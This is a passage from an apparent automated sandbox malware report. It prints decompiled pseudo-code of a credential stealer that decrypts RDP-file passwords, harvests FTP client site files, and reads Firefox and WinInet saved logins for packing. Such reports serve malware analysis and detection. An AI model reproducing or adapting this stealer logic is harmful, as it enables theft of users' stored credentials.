                                                                        							break;
                                                                        						}
                                                                        						L24:
                                                                        						E00401486(_a4, 0xbeef0002);
                                                                        						E004014BC(_a4, _v12, _v8);
                                                                        						E004017D5(_v24);
                                                                        						return E00401FB0( &_v20);
                                                                        					}
                                                                        					return _t48;
                                                                        				} else {
                                                                        					return _t45;
                                                                        				}
                                                                        			}




























                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: <_OP3_Password2
                                                                        • API String ID: 0-4172175086
                                                                        • Opcode ID: 654973a1006a4803e0c5775a1734a04b48ce5acc9a359d74e5f5969f10b4ccec
                                                                        • Instruction ID: 77b5fce038b4bca379508027ff7cf5d2a33336c3527dc7fb70d514a4f254e7d3
                                                                        • Opcode Fuzzy Hash: 654973a1006a4803e0c5775a1734a04b48ce5acc9a359d74e5f5969f10b4ccec
                                                                        • Instruction Fuzzy Hash: 6D417F72C00109AECF12ABA2CC019EEBEB5EB54354F14847BF414B21B1D73D8E61EB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 80%
                                                                        			E0040CEA2(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v20;
                                                                        				signed char _v24;
                                                                        				CHAR* _v28;
                                                                        				signed char _v32;
                                                                        				void* _v36;
                                                                        				char _v40;
                                                                        				void* _v44;
                                                                        				char _v48;
                                                                        				signed char _t40;
                                                                        				signed char _t43;
                                                                        				signed char _t51;
                                                                        				signed char _t53;
                                                                        				signed char _t55;
                                                                        				signed char _t59;
                                                                        				signed char _t64;
                                                                        				signed char _t65;
                                                                        				char _t66;
                                                                        
                                                                        				if( *0x41442d != 0) {
                                                                        					_t40 = E00401F1B(__eflags, _a8,  &_v20);
                                                                        					__eflags = _t40;
                                                                        					if(_t40 != 0) {
                                                                        						__eflags = _v8 - 0x100000;
                                                                        						if(_v8 >= 0x100000) {
                                                                        							L23:
                                                                        							return E00401FB0( &_v20);
                                                                        						}
                                                                        						_t43 = E004022C7(_v12, _v8);
                                                                        						__eflags = _t43;
                                                                        						if(_t43 != 0) {
                                                                        							goto L23;
                                                                        						}
                                                                        						_v24 = E0040CDD0("username:s:", _v12, _v8);
                                                                        						_v28 = E0040CDD0("password 51:b:", _v12, _v8);
                                                                        						_v32 = E0040CDD0("full address:s:", _v12, _v8);
                                                                        						__eflags = _v24;
                                                                        						if(_v24 == 0) {
                                                                        							L22:
                                                                        							E004017D5(_v24);
                                                                        							E004017D5(_v28);
                                                                        							E004017D5(_v32);
                                                                        							goto L23;
                                                                        						}
                                                                        						__eflags = _v28;
                                                                        						if(_v28 == 0) {
                                                                        							goto L22;
                                                                        						}
                                                                        						__eflags = _v32;
                                                                        						if(_v32 != 0) {
                                                                        							_t51 = lstrlenA(_v28);
                                                                        							_t64 = _t51 >> 1;
                                                                        							_push(_t64);
                                                                        							while(1) {
                                                                        								_t65 = _t64;
                                                                        								__eflags = _t65;
                                                                        								if(_t65 == 0) {
                                                                        									break;
                                                                        								}
                                                                        								asm("lodsw");
                                                                        								__eflags = _t51 - 0x30;
                                                                        								if(_t51 < 0x30) {
                                                                        									L12:
                                                                        									_t53 = _t51 - 0x41 + 0xa;
                                                                        									__eflags = _t53;
                                                                        									L13:
                                                                        									__eflags = _t53 - 0x30;
                                                                        									if(_t53 < 0x30) {
                                                                        										L16:
                                                                        										_t55 = _t53 - 0x41 + 0xa;
                                                                        										__eflags = _t55;
                                                                        										L17:
                                                                        										_t51 = _t55 << 0x00000004 | _t55 << 0x00000004;
                                                                        										asm("stosb");
                                                                        										_t64 = _t65 - 1;
                                                                        										__eflags = _t64;
                                                                        										continue;
                                                                        									}
                                                                        									__eflags = _t53 - 0x39;
                                                                        									if(_t53 > 0x39) {
                                                                        										goto L16;
                                                                        									}
                                                                        									_t55 = _t53 - 0x30;
                                                                        									goto L17;
                                                                        								}
                                                                        								__eflags = _t51 - 0x39;
                                                                        								if(_t51 > 0x39) {
                                                                        									goto L12;
                                                                        								}
                                                                        								_t53 = _t51 - 0x30;
                                                                        								goto L13;
                                                                        							}
                                                                        							_pop(_t66);
                                                                        							_v40 = _t66;
                                                                        							_push(_v28);
                                                                        							_pop( *_t22);
                                                                        							_v44 = 0;
                                                                        							_t59 =  *0x41442d( &_v40, 0, 0, 0, 0, 1,  &_v48);
                                                                        							__eflags = _t59;
                                                                        							if(_t59 != 0) {
                                                                        								__eflags = _v44;
                                                                        								if(__eflags != 0) {
                                                                        									E0040CC8E(__eflags, _a4, _v24, _v32, _v44, _v48);
                                                                        									LocalFree(_v44);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L22;
                                                                        					}
                                                                        					return _t40;
                                                                        				} else {
                                                                        					return __eax;
                                                                        				}
                                                                        			}






















                                                                        0x00000000
                                                                        0x0040cf74
                                                                        0x00000000
                                                                        0x0040cf74
                                                                        0x0040cf5e
                                                                        0x0040cf60
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040cf62
                                                                        0x00000000
                                                                        0x0040cf62
                                                                        0x0040cf8a
                                                                        0x0040cf8b
                                                                        0x0040cf8e
                                                                        0x0040cf91
                                                                        0x0040cf94
                                                                        0x0040cfad
                                                                        0x0040cfb3
                                                                        0x0040cfb5
                                                                        0x0040cfb7
                                                                        0x0040cfbb
                                                                        0x0040cfcc
                                                                        0x0040cfd4
                                                                        0x0040cfd4
                                                                        0x0040cfbb
                                                                        0x0040cfb5
                                                                        0x00000000
                                                                        0x0040cf3e
                                                                        0x0040cffd
                                                                        0x0040ceb6
                                                                        0x0040ceb6
                                                                        0x0040ceb6

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040CF47
                                                                        • LocalFree.KERNEL32(00000000), ref: 0040CFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeLocallstrlen
                                                                        • String ID: full address:s:$password 51:b:$username:s:
                                                                        • API String ID: 3681330831-2945746679
                                                                        • Opcode ID: 3fe55126ee548df5cd7947a5c5ab92820d57a4bc6a1a7a61529fff14c4b352be
                                                                        • Instruction ID: 60ed0193d19ee7ec15275bf9add7d535b63f43271d864edcc8c9435468f68b04
                                                                        • Opcode Fuzzy Hash: 3fe55126ee548df5cd7947a5c5ab92820d57a4bc6a1a7a61529fff14c4b352be
                                                                        • Instruction Fuzzy Hash: CB412B7285010AEADF119BE1CD46BEEBB76AB48314F14023BE201711E0D6B94A92DB5E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E0040CDD0(char* _a4, short* _a8, intOrPtr _a12) {
                                                                        				unsigned int _v8;
                                                                        				char* _v12;
                                                                        				int _v16;
                                                                        				int _t24;
                                                                        				char* _t28;
                                                                        				int _t29;
                                                                        				CHAR* _t30;
                                                                        				int _t32;
                                                                        				CHAR* _t39;
                                                                        				void* _t40;
                                                                        				void* _t41;
                                                                        				int _t42;
                                                                        
                                                                        				_v12 = 0;
                                                                        				_v16 = 0;
                                                                        				_push(_a12);
                                                                        				_pop( *_t4);
                                                                        				_v8 = _v8 >> 1;
                                                                        				_t24 = WideCharToMultiByte(0, 0, _a8, _v8, 0, 0, 0, 0);
                                                                        				if(_t24 != 0) {
                                                                        					_v12 = E004017EC(_t24);
                                                                        					_t42 = _t24;
                                                                        					if(WideCharToMultiByte(0, 0, _a8, _v8, _v12, _t42, 0, 0) == 0) {
                                                                        						E004017D5(_v12);
                                                                        						_v12 = 0;
                                                                        					}
                                                                        				}
                                                                        				if(_v12 == 0) {
                                                                        					L12:
                                                                        					E004017D5(_v12);
                                                                        					return _v16;
                                                                        				} else {
                                                                        					_t28 = StrStrIA(_v12, _a4);
                                                                        					if(_t28 == 0) {
                                                                        						goto L12;
                                                                        					}
                                                                        					_t29 = lstrlenA(_a4);
                                                                        					_t40 = _t28;
                                                                        					_t30 = _t29 + _t40;
                                                                        					_t39 = _t30;
                                                                        					while( *_t30 != 0) {
                                                                        						if( *_t30 != 0xd) {
                                                                        							_t30 =  &(_t30[1]);
                                                                        							continue;
                                                                        						}
                                                                        						 *_t30 = 0;
                                                                        						_t32 = lstrlenA(_t39);
                                                                        						if(_t32 != 0) {
                                                                        							_v16 = E004017EC(_t32);
                                                                        							_t41 = _t32;
                                                                        							E00401823(_t39, _v16, _t41);
                                                                        						}
                                                                        						goto L12;
                                                                        					}
                                                                        					goto L12;
                                                                        				}
                                                                        			}
















                                                                        APIs
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE00
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040CE26
                                                                        • StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE4A
                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE6C
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE57
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharLocalMultiWidelstrlen$AllocFree
                                                                        • String ID:
                                                                        • API String ID: 1890766102-0
                                                                        • Opcode ID: 6d8815957a45e9dfaf6c767d0e2a68735c9a9fd13d1a6cd547d648ce541a1017
                                                                        • Instruction ID: 6b6f5cbbcb276d5830e96960ee9e9a70e92c04bd6c7ad57fcd0bd2d929c8f237
                                                                        • Opcode Fuzzy Hash: 6d8815957a45e9dfaf6c767d0e2a68735c9a9fd13d1a6cd547d648ce541a1017
                                                                        • Instruction Fuzzy Hash: B8219276900208FEEF125FE1CC42F9E7BB9EB14314F20416AB114BA1E1D7BD5A80DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E004059DE(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char* _t9;
                                                                        				char* _t11;
                                                                        				void* _t22;
                                                                        				char* _t23;
                                                                        				char* _t24;
                                                                        
                                                                        				_t22 = __edx;
                                                                        				_v8 = E0040150D(_a4, 7, 0);
                                                                        				_t24 =  *0x414082; // 0x0
                                                                        				_t23 =  *0x414086; // 0x0
                                                                        				if( *_t23 != 0) {
                                                                        					do {
                                                                        						_t9 = StrStrIA(_t23, "FTP Navigator");
                                                                        						_t26 = _t9;
                                                                        						if(_t9 != 0) {
                                                                        							E00404131(_a4, E0040234A(_t26, _t24), "ftplist.txt", 0xbeef0000);
                                                                        							E004017D5(_t17);
                                                                        						}
                                                                        						_t11 = StrStrIA(_t23, "FTP Commander");
                                                                        						_t27 = _t11;
                                                                        						if(_t11 != 0) {
                                                                        							E00404131(_a4, E0040234A(_t27, _t24), "ftplist.txt", 0xbeef0000);
                                                                        							E004017D5(_t14);
                                                                        						}
                                                                        						while( *_t24 != 0) {
                                                                        							_t24 = _t24 + 1;
                                                                        							__eflags = _t24;
                                                                        						}
                                                                        						_t24 = _t24 + 1;
                                                                        						asm("cld");
                                                                        						asm("repne scasb");
                                                                        						_t29 =  *_t23;
                                                                        					} while ( *_t23 != 0);
                                                                        				}
                                                                        				return E00401553(_t22, _t29, _a4, _v8);
                                                                        			}










                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(00000000,FTP Navigator), ref: 00405A0C
                                                                        • StrStrIA.SHLWAPI(00000000,FTP Commander,00000000,FTP Navigator), ref: 00405A3A
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
                                                                          • Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
                                                                          • Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$FreeLocal
                                                                        • String ID: FTP Commander$FTP Navigator$ftplist.txt
                                                                        • API String ID: 1884169789-2424314702
                                                                        • Opcode ID: 071ed715c1575a53d15bd0aefe27d8b6db41900db9b29af0497b29d0d5fd1d10
                                                                        • Instruction ID: 47b874bb8b3e3dfff6b261f529f786fdb312fb9a703bd988841c28134be43e48
                                                                        • Opcode Fuzzy Hash: 071ed715c1575a53d15bd0aefe27d8b6db41900db9b29af0497b29d0d5fd1d10
                                                                        • Instruction Fuzzy Hash: 2C0126706405057ADF117B728C02FAF3E29DF90324F24013BB855B51E2EB7C5E828AAD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 90%
                                                                        			E0040D055(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char* _t8;
                                                                        				void* _t19;
                                                                        				char* _t20;
                                                                        
                                                                        				_t19 = __edx;
                                                                        				_v8 = E0040150D(_a4, 0x46, 0);
                                                                        				_t20 =  *0x414082; // 0x0
                                                                        				if( *_t20 == 0) {
                                                                        					L7:
                                                                        					return E00401553(_t19, _t24, _a4, _v8);
                                                                        				} else {
                                                                        					goto L1;
                                                                        				}
                                                                        				do {
                                                                        					L1:
                                                                        					_t8 = StrStrIA(_t20, "FTPNow");
                                                                        					_t22 = _t8;
                                                                        					if(_t8 == 0) {
                                                                        						__eflags = StrStrIA(_t20, "FTP Now");
                                                                        						if(__eflags == 0) {
                                                                        							goto L6;
                                                                        						}
                                                                        						L4:
                                                                        						_t14 = E0040234A(_t22, _t20);
                                                                        						if(E0040234A(_t22, _t20) != 0) {
                                                                        							E00404131(_a4, _t14, "sites.xml", 0xbeef0000);
                                                                        							E004017D5(_t14);
                                                                        						}
                                                                        						goto L6;
                                                                        					}
                                                                        					goto L4;
                                                                        					L6:
                                                                        					asm("cld");
                                                                        					asm("repne scasb");
                                                                        					_t24 =  *_t20;
                                                                        				} while ( *_t20 != 0);
                                                                        				goto L7;
                                                                        			}








                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(00000000,FTPNow), ref: 0040D07C
                                                                        • StrStrIA.SHLWAPI(00000000,FTP Now,00000000,FTPNow), ref: 0040D08D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FTP Now$FTPNow$sites.xml
                                                                        • API String ID: 0-284577462
                                                                        • Opcode ID: 0860df4516fb36a40e406cc847c61d919e130169d8f6226aaa304c7ed75c8c5c
                                                                        • Instruction ID: 498bbafb3df18556925cf8714bf549501193d9edb70c728f32a1b086909ed1ed
                                                                        • Opcode Fuzzy Hash: 0860df4516fb36a40e406cc847c61d919e130169d8f6226aaa304c7ed75c8c5c
                                                                        • Instruction Fuzzy Hash: 58F0F971D04601B9DB312BB18C02FAF3E654BC1768F24013BB61DB51E2DB7C9E82965D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E0040C5EC(void* __eax, intOrPtr _a4, char* _a8) {
                                                                        				short* _v8;
                                                                        				int _v12;
                                                                        				void* _v16;
                                                                        				char _v20;
                                                                        				intOrPtr _v24;
                                                                        				intOrPtr _v28;
                                                                        				intOrPtr _t37;
                                                                        				intOrPtr _t40;
                                                                        				intOrPtr _t42;
                                                                        				intOrPtr _t47;
                                                                        
                                                                        				if( *0x4143e1 != 0) {
                                                                        					_v12 = MultiByteToWideChar(0, 0, _a8, 0xffffffff, 0, 0);
                                                                        					_v8 = E004017EC(_v12);
                                                                        					MultiByteToWideChar(0, 0, _a8, 0xffffffff, _v8, _v12);
                                                                        					_t37 =  *0x4143e1(_v8, 0, 0x12, 0, 0,  &_v16);
                                                                        					__eflags = _t37;
                                                                        					if(_t37 >= 0) {
                                                                        						_t52 =  *_v16;
                                                                        						_t40 =  *((intOrPtr*)( *_v16 + 0x10))(_v16, L"Settings", 0, 0x12, 0,  &_v20);
                                                                        						__eflags = _t40;
                                                                        						if(_t40 >= 0) {
                                                                        							_t42 = E0040106A(_t40, _t52, _v20);
                                                                        							_v28 = _t42;
                                                                        							_t43 = _t42;
                                                                        							__eflags = _t42;
                                                                        							if(_t42 != 0) {
                                                                        								_v24 = E004017EC(_v28);
                                                                        								_t47 = E0040110B(E00401273(_t45, _t52, _v20), _t52, __eflags, _v20, _v24, _v28);
                                                                        								__eflags = _t47;
                                                                        								if(_t47 != 0) {
                                                                        									E00401486(_a4, 0xbeef0000);
                                                                        									E004014BC(_a4, _v24, _v28);
                                                                        								}
                                                                        								_t43 = E004017D5(_v24);
                                                                        							}
                                                                        							E00401019(_t43, _t52, _v20);
                                                                        						}
                                                                        						 *((intOrPtr*)( *_v16 + 8))(_v16);
                                                                        					}
                                                                        					return E004017D5(_v8);
                                                                        				} else {
                                                                        					return __eax;
                                                                        				}
                                                                        			}














                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C60C
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C62E
                                                                        • StgOpenStorage.OLE32(?,00000000,00000012,00000000,00000000,?,00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?), ref: 0040C642
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$OpenStorage
                                                                        • String ID: Settings
                                                                        • API String ID: 2489594185-473154195
                                                                        • Opcode ID: 36a72132745558ed86aa4236cfd24305e6f8e4def3dae76d49709cdd574100bc
                                                                        • Instruction ID: 067bfa4a53f500e918e8827405899557c221b1b6cfe0abe27263aec1400916df
                                                                        • Opcode Fuzzy Hash: 36a72132745558ed86aa4236cfd24305e6f8e4def3dae76d49709cdd574100bc
                                                                        • Instruction Fuzzy Hash: E531FC35A4010AFBDF11AFD1CC42FEEBB72AF04714F208266B610791F1D7769A50AB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E004016F2(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				void* _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				intOrPtr _v24;
                                                                        				intOrPtr _v28;
                                                                        				void* _t27;
                                                                        				signed int _t41;
                                                                        				signed int _t42;
                                                                        				signed int _t45;
                                                                        
                                                                        				_t49 = __edx;
                                                                        				_t45 = 0;
                                                                        				_t27 =  &_v8;
                                                                        				_push(_t27);
                                                                        				_push(_a4);
                                                                        				L00410DBE();
                                                                        				if(_t27 >= 0) {
                                                                        					_v16 = E0040106A(_t27, __edx, _a4);
                                                                        					_t27 = GlobalLock(_v8);
                                                                        					if(_t27 != 0) {
                                                                        						_v20 = _t27;
                                                                        						_v24 = E004017EC(E004124C2() + 0x500000);
                                                                        						_v28 = E004017EC(E004124C8(_v16) + 0x100000);
                                                                        						_v12 = E004124D6(_v20, _v28, _v16, _v24, 0, _v16);
                                                                        						E004012C7(GlobalUnlock(_v8), _t49, _a4);
                                                                        						_t41 = E0040149B(_a4, "PKDFILE0YUICRYPTED0YUI1.0", 8);
                                                                        						_t42 = E00401486(_a4, _v16);
                                                                        						_t45 = _t41 & _t42 & E004014BC(_a4, _v28, _v12);
                                                                        						E004017D5(_v24);
                                                                        						_t27 = E004017D5(_v28);
                                                                        					}
                                                                        				}
                                                                        				E0040125A(_t27, _t49, _a4);
                                                                        				return _t45;
                                                                        			}














                                                                        APIs
                                                                        • GetHGlobalFromStream.OLE32(?,?), ref: 00401702
                                                                        • GlobalLock.KERNEL32 ref: 0040171D
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • GlobalUnlock.KERNEL32(?,?,?,?,?,-00100000,-00500000), ref: 0040177B
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        • PKDFILE0YUICRYPTED0YUI1.0, xrefs: 0040178A
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Global$Local$AllocFreeFromLockStreamUnlock
                                                                        • String ID: PKDFILE0YUICRYPTED0YUI1.0
                                                                        • API String ID: 1329788818-258907703
                                                                        • Opcode ID: 03f03f22bb2aa11fbb6c60be5ecb4a60618464061266b6a1867e958b8bd07468
                                                                        • Instruction ID: f2d47b6307a512ba182872b571bc651cab0e361a1f568c2dbe9588986264a33a
                                                                        • Opcode Fuzzy Hash: 03f03f22bb2aa11fbb6c60be5ecb4a60618464061266b6a1867e958b8bd07468
                                                                        • Instruction Fuzzy Hash: 1D212CB6D00108BFDF026FE2CD42AEDBE75EF10344F10413AB914B51B1E77A8AA09B59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00408390(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char** _a16) {
                                                                        				char* _v8;
                                                                        				char* _v12;
                                                                        				char* _v16;
                                                                        				char* _v20;
                                                                        				char* _v24;
                                                                        				void* _t47;
                                                                        				char* _t49;
                                                                        				char** _t50;
                                                                        				char* _t70;
                                                                        				void* _t71;
                                                                        				char* _t72;
                                                                        				char* _t73;
                                                                        				char* _t74;
                                                                        				char* _t75;
                                                                        				void* _t76;
                                                                        
                                                                        				_t76 = __eflags;
                                                                        				_t71 = __edx;
                                                                        				E00401388(_t47, _a4, 1, _a16);
                                                                        				_t49 = E00401304(_t76, _a4, _a16);
                                                                        				_t74 = _t49;
                                                                        				while(1) {
                                                                        					_t75 = _t74;
                                                                        					if(_t75 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t50 = _a16;
                                                                        					__eflags =  *_t50;
                                                                        					if( *_t50 == 0) {
                                                                        						return _t50;
                                                                        					}
                                                                        					_v8 = 0;
                                                                        					_t72 = E004082CF(_t71, _a4, _a12, _a16,  &_v8);
                                                                        					__eflags = _v8;
                                                                        					if(_v8 == 0) {
                                                                        						_v24 = 0;
                                                                        					} else {
                                                                        						_t70 = StrStrIA(_v8, "http://");
                                                                        						__eflags = _t70;
                                                                        						if(_t70 == 0) {
                                                                        							_t70 = StrStrIA(_v8, "https://");
                                                                        						}
                                                                        						_v24 = _t70;
                                                                        					}
                                                                        					__eflags = _v24;
                                                                        					if(_v24 != 0) {
                                                                        						E00401486(_a8, 0xbeef0001);
                                                                        						E004014E8(_a8, _v8);
                                                                        					}
                                                                        					while(1) {
                                                                        						_t73 = _t72;
                                                                        						__eflags = _t73;
                                                                        						if(_t73 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						__eflags =  *_a16;
                                                                        						if( *_a16 != 0) {
                                                                        							_v12 = 0;
                                                                        							_v16 = 0;
                                                                        							_v20 = 0;
                                                                        							E0040834C(_t71, _a4, _a16,  &_v12,  &_v16,  &_v20);
                                                                        							__eflags = _v24;
                                                                        							if(_v24 != 0) {
                                                                        								__eflags = _v12;
                                                                        								if(_v12 != 0) {
                                                                        									__eflags = _v16;
                                                                        									if(_v16 != 0) {
                                                                        										L17:
                                                                        										E004014E8(_a8, _v12);
                                                                        										E004014E8(_a8, _v16);
                                                                        										E004014E8(_a8, _v20);
                                                                        									} else {
                                                                        										__eflags = _v20;
                                                                        										if(_v20 != 0) {
                                                                        											goto L17;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							E004017D5(_v12);
                                                                        							E004017D5(_v16);
                                                                        							E004017D5(_v20);
                                                                        							_t72 = _t73 - 1;
                                                                        							__eflags = _t72;
                                                                        							continue;
                                                                        						} else {
                                                                        						}
                                                                        						break;
                                                                        					}
                                                                        					__eflags = _v24;
                                                                        					if(_v24 != 0) {
                                                                        						E00401486(_a8, 0);
                                                                        						E00401486(_a8, 0);
                                                                        						E00401486(_a8, 0);
                                                                        					}
                                                                        					_t49 = E004017D5(_v8);
                                                                        					_t74 = _t75 - 1;
                                                                        					__eflags = _t74;
                                                                        				}
                                                                        				return _t49;
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: http://$https://
                                                                        • API String ID: 0-1916535328
                                                                        • Opcode ID: a063d2c108344c13aabfd45f0258bb27b0b3823767d86f34b72639bd5456c7cb
                                                                        • Instruction ID: 13fb2b29f01f002918b78c72c7eb8ae77e77f5b78bf32f99a3c6c152548360db
                                                                        • Opcode Fuzzy Hash: a063d2c108344c13aabfd45f0258bb27b0b3823767d86f34b72639bd5456c7cb
                                                                        • Instruction Fuzzy Hash: CF41053180010AFBDF22AF91CE05BDE7B76AF00314F10817AB950351F1EB794AA0EB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • lstrlenW.KERNEL32(abe2869f-9b47-4cd9-a358-c22904dba7f7,?,?,00000000), ref: 0040A66D
                                                                        • LocalFree.KERNEL32(00000000), ref: 0040A6CF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeLocallstrlen
                                                                        • String ID: Microsoft_WinInet_*$abe2869f-9b47-4cd9-a358-c22904dba7f7
                                                                        • API String ID: 3681330831-3320880043
                                                                        • Opcode ID: 576424615bffc08a157af85e91cbfbecc0d476d7a66ca4336e9b72815a3144d6
                                                                        • Instruction ID: 303936e2a8a44d611f5ab066420c5948f3d508f4a04a3d0421c5e20b59dd798b
                                                                        • Opcode Fuzzy Hash: 576424615bffc08a157af85e91cbfbecc0d476d7a66ca4336e9b72815a3144d6
                                                                        • Instruction Fuzzy Hash: 38312972900209EBDF219F84DC0ABEEB7B4EB44305F184436E550B62D0D7B95AD4DBAA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E0040C0C3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                        				char _v8;
                                                                        				char _v12;
                                                                        				CHAR* _v16;
                                                                        				CHAR* _v20;
                                                                        				intOrPtr _v24;
                                                                        				char _v28;
                                                                        				int _t35;
                                                                        
                                                                        				if(_a16 == 5) {
                                                                        					_t35 = E0040B1AB(_a12, 2,  &_v8,  &_v12,  &_v16);
                                                                        					if(_v12 == 1) {
                                                                        						_push(_v16);
                                                                        						_pop( *_t8);
                                                                        						_t35 = lstrcmpiA(_v20, "moz_logins");
                                                                        						if(_t35 == 0) {
                                                                        							_t35 = E0040B1AB(_a12, 0,  &_v8,  &_v12,  &_v16);
                                                                        							if(_v12 == 1) {
                                                                        								_t35 = lstrcmpA("table", _v16);
                                                                        								if(_t35 == 0) {
                                                                        									_t35 = E0040B1AB(_a12, 3,  &_v8,  &_v12,  &_v16);
                                                                        									if(_v12 == 0) {
                                                                        										 *_t22 =  *_v16;
                                                                        										_t35 = E0040B1AB(_a12, 4,  &_v8,  &_v12,  &_v16);
                                                                        										if(_v12 == 1) {
                                                                        											 *0x419158 = 0xffffffff;
                                                                        											 *0x41915c = 0xffffffff;
                                                                        											 *0x419160 = 0xffffffff;
                                                                        											_t35 = E0040B69A(_v16, E0040BE43);
                                                                        											_v28 = 1;
                                                                        											if( *0x419158 != 0xffffffff &&  *0x41915c != 0xffffffff &&  *0x419160 != 0xffffffff) {
                                                                        												return E0040B38F(_a4, _a8, _v24,  &_v28, _a20, E0040BEFE);
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t35;
                                                                        			}

                                                                        APIs
                                                                        • lstrcmpiA.KERNEL32(00000000,moz_logins,?), ref: 0040C101
